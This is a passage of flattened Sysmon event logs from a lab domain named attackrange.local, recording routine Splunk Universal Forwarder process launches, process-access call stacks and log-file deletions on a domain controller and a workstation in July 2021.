07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.220{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547450F2CF40C62DA4CFCAC7C046098A,SHA256=F6242ED90EAE1ED7A42C680B4C0869E2CCB7D681D534F9D6AFD932A48B7C1D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:50.238{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E16C9B09EA34E4F29CF81B510713D8FC,SHA256=9435A91B48F627DD83EDADD83530F9A85EECFEA6E46418AE4DE8EB6B162ABA28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.656{466BC892-F497-60EB-2A7D-00000000CF01}95407808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.476{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6599853AB3DCD139D8DDC9DB5C226552,SHA256=3DF6F566BCCBD2F4433557C6A1A90F0DBDD91B27CD9095C77A59A0F3126EDD0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1851649C9A6128CB390A490DFCAB1BAD,SHA256=A57893F92148310A34938D3CA977974609D40A81F7E87A6A9D283673A79F7616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF4E9B33057C46A7F58409FF1999D459,SHA256=2186DCB53B55ADF3F589CE0D8DF8815308CF8388EEBDFE57B9F57AF23ECA00AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:51.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3095A154DB7C2E08146085F9899DCC8E,SHA256=60D83DA727F8E10BDEB9480D494FFE524B96F603D66B9EA4D92FC1A91C59F29B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.819{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.820{466BC892-F498-60EB-2C7D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C55387C013F9BEEAACBA9654A586A6,SHA256=1D4B3104DAFA7144D3DA4984BA77ABD68E5B379B503E7433334A7D6DB8C96CC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.473{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9AD15A282760AB833BA885BAF5F3E8E,SHA256=308427D7442F0BDAED67DED11A7AD855991046642252B35500FAAF125C413799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:52.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1E34B7042E9B9A34FE2E68A5B2E3EE1,SHA256=619C3CF1BCADC02F8CDEA57C3BDD26134AF07E1C951D3313CBB831B2FAF5AD8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.373{466BC892-F498-60EB-2B7D-00000000CF01}9808388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program 